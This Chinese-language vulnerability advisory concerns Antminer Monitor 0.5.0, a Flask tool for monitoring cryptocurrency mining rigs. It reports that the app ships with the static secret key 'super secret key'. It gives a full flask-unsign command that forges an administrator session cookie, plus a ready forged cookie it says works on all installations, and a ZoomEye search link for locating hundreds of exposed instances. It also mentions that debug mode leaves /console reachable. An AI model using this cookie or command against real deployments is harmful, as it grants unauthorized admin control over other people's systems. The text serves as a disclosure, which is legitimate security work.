
日期: 09/06/2021
Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 漏洞作者: CQR.company / Vulnz.
厂商主页: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor
软件链接: https://github.com/anselal/antminer-monitor, https://soulis.tech/
版本: 0.5.0
测试平台: Windows, Linux, Macos
该软件通常用于监控Antminer矿机,并且可以很容易地 在ZoomEye(800)、Shodan(500)中找到。 目前这是最流行的Antminer监控工具。 Antminer Monitor中存在漏洞是由于后门或 配置错误造成的 开发人员在Flask服务器的设置文件中进行了错误配置。
设置文件中有一个预定义的秘密字符串,本应是随机生成的 ,然而在此版本中是静态的 build.antminer-monitor/settings.py at 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py
密钥是 'super secret key'.
基于此信息,我们可以构造授权绕过cookie。
使用软件flask-unsing我们可以生成cookie,它将提供 你管理员访问权限。
flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key"
此外,您可以使用此通用cookie来访问Web界面 的Flask应用程序。
此cookie可以在所有系统的"session"字段中工作。
.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU
此外,DEBUG = True 意味着 /console 可以工作,但需要PIN码。